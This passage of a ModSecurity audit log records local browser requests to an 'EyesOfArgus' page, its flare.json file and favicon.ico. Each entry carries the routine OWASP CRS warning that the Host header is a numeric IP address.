REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc3-H8AAQEAAAkVV5IAAAAA\"]"],"stopwatch":{"p1":441,"p2":1203,"p3":60,"p4":152,"p5":54,"sr":22,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:44:44 --0400","transaction_id":"WRc3-H8AAQEAAAkVV5MAAAAA","remote_address":"127.0.0.1","remote_port":42586,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc3-H8AAQEAAAkVV5MAAAAA\"]"],"stopwatch":{"p1":412,"p2":922,"p3":47,"p4":355,"p5":50,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:44:44 --0400","transaction_id":"WRc3-H8AAQEAAAkVV5QAAAAA","remote_address":"127.0.0.1","remote_port":42586,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc3-H8AAQEAAAkVV5QAAAAA\"]"],"stopwatch":{"p1":382,"p2":879,"p3":44,"p4":237,"p5":46,"sr":15,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:46:21 --0400","transaction_id":"WRc4XX8AAQEAABwNvyAAAAAA","remote_address":"127.0.0.1","remote_port":42646,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":301,"headers":{"Location":"http://127.0.0.1/EyesOfArgus/","Content-Length":"312","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>301 Moved Permanently</title>\n</head><body>\n<h1>Moved Permanently</h1>\n<p>The document has moved <a href=\"http://127.0.0.1/EyesOfArgus/\">here</a>.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus\"] [unique_id \"WRc4XX8AAQEAABwNvyAAAAAA\"]"],"handler":"httpd/unix-directory","stopwatch":{"p1":553,"p2":1248,"p3":51,"p4":310,"p5":55,"sr":40,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:46:21 --0400","transaction_id":"WRc4XX8AAQEAABwNvyEAAAAA","remote_address":"127.0.0.1","remote_port":42646,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:44:39 GMT","ETag":"\"cc8-54f6a89c37b32-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1210","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc4XX8AAQEAABwNvyEAAAAA\"]"],"stopwatch":{"p1":380,"p2":869,"p3":58,"p4":312,"p5":50,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:46:22 --0400","transaction_id":"WRc4Xn8AAQEAABwNvyIAAAAA","remote_address":"127.0.0.1","remote_port":42646,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/flare.json HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"application/json,*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Referer":"http://127.0.0.1/EyesOfArgus/","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:46:18 GMT","ETag":"\"295-54f6a8fa838c0\"","Accept-Ranges":"bytes","Content-Length":"661","Keep-Alive":"timeout=5, max=98","Connection":"Keep-Alive","Content-Type":"application/json"},"body":""},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/flare.json\"] [unique_id \"WRc4Xn8AAQEAABwNvyIAAAAA\"]"],"stopwatch":{"p1":381,"p2":885,"p3":67,"p4":140,"p5":58,"sr":17,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:46:22 --0400","transaction_id":"WRc4Xn8AAQEAABwNvyMAAAAA","remote_address":"127.0.0.1","remote_port":42646,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"*/*","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=97","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4Xn8AAQEAABwNvyMAAAAA\"]"],"stopwatch":{"p1":415,"p2":939,"p3":52,"p4":242,"p5":82,"sr":18,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:46:22 --0400","transaction_id":"WRc4Xn8AAQEAABwNvyQAAAAA","remote_address":"127.0.0.1","remote_port":42646,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /favicon.ico HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","Connection":"keep-alive"}},"response":{"protocol":"HTTP/1.1","status":404,"headers":{"Content-Length":"284","Keep-Alive":"timeout=5, max=96","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL /favicon.ico was not found on this server.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/favicon.ico\"] [unique_id \"WRc4Xn8AAQEAABwNvyQAAAAA\"]"],"stopwatch":{"p1":377,"p2":797,"p3":90,"p4":312,"p5":47,"sr":16,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:01 --0400","transaction_id":"WRc4hX8AAQEAABwOGnsAAAAB","remote_address":"127.0.0.1","remote_port":42666,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":301,"headers":{"Location":"http://127.0.0.1/EyesOfArgus/","Content-Length":"312","Keep-Alive":"timeout=5, max=100","Connection":"Keep-Alive","Content-Type":"text/html; charset=iso-8859-1"},"body":"<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n<html><head>\n<title>301 Moved Permanently</title>\n</head><body>\n<h1>Moved Permanently</h1>\n<p>The document has moved <a href=\"http://127.0.0.1/EyesOfArgus/\">here</a>.</p>\n<hr>\n<address>Apache/2.4.18 (Ubuntu) Server at 127.0.0.1 Port 80</address>\n</body></html>\n"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus\"] [unique_id \"WRc4hX8AAQEAABwOGnsAAAAB\"]"],"handler":"httpd/unix-directory","stopwatch":{"p1":852,"p2":2085,"p3":90,"p4":547,"p5":100,"sr":52,"sw":1,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 (Ubuntu)","engine_mode":"ENABLED"}}
{"transaction":{"time":"13/May/2017:12:47:01 --0400","transaction_id":"WRc4hX8AAQEAABwOGnwAAAAB","remote_address":"127.0.0.1","remote_port":42666,"local_address":"127.0.0.1","local_port":80},"request":{"request_line":"GET /EyesOfArgus/ HTTP/1.1","headers":{"Host":"127.0.0.1","User-Agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0","Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8","Accept-Language":"en-US,en;q=0.5","Accept-Encoding":"gzip, deflate","DNT":"1","Connection":"keep-alive","Upgrade-Insecure-Requests":"1"}},"response":{"protocol":"HTTP/1.1","status":200,"headers":{"Last-Modified":"Sat, 13 May 2017 16:46:57 GMT","ETag":"\"ccc-54f6a91f7e6c1-gzip\"","Accept-Ranges":"bytes","Vary":"Accept-Encoding","Content-Encoding":"gzip","Content-Length":"1213","Keep-Alive":"timeout=5, max=99","Connection":"Keep-Alive","Content-Type":"text/html"},"body":"\u001F‹\b"},"audit_data":{"messages":["Warning. Pattern match \"^[\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"]"],"error_messages":["[file \"apache2_util.c\"] [line 273] [level 3] [client 127.0.0.1] ModSecurity: Warning. Pattern match \"^[\\\\\\\\\\\\\\\\d.:]+$\" at REQUEST_HEADERS:Host. [file \"/etc/apache2/modsecurity.d/owasp-modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf\"] [line \"793\"] [id \"920350\"] [rev \"2\"] [msg \"Host header is a numeric IP address\"] [data \"127.0.0.1\"] [severity \"WARNING\"] [ver \"OWASP_CRS/3.0.0\"] [maturity \"9\"] [accuracy \"9\"] [tag \"application-multi\"] [tag \"language-multi\"] [tag \"platform-multi\"] [tag \"attack-protocol\"] [tag \"OWASP_CRS/PROTOCOL_VIOLATION/IP_HOST\"] [tag \"WASCTC/WASC-21\"] [tag \"OWASP_TOP_10/A7\"] [tag \"PCI/6.5.10\"] [hostname \"127.0.0.1\"] [uri \"/EyesOfArgus/\"] [unique_id \"WRc4hX8AAQEAABwOGnwAAAAB\"]"],"stopwatch":{"p1":631,"p2":1415,"p3":80,"p4":327,"p5":168,"sr":25,"sw":0,"l":0,"gc":0},"response_body_dechunked":true,"producer":["ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/)","OWASP_CRS/3.0.0"],"server":"Apache/2.4.18 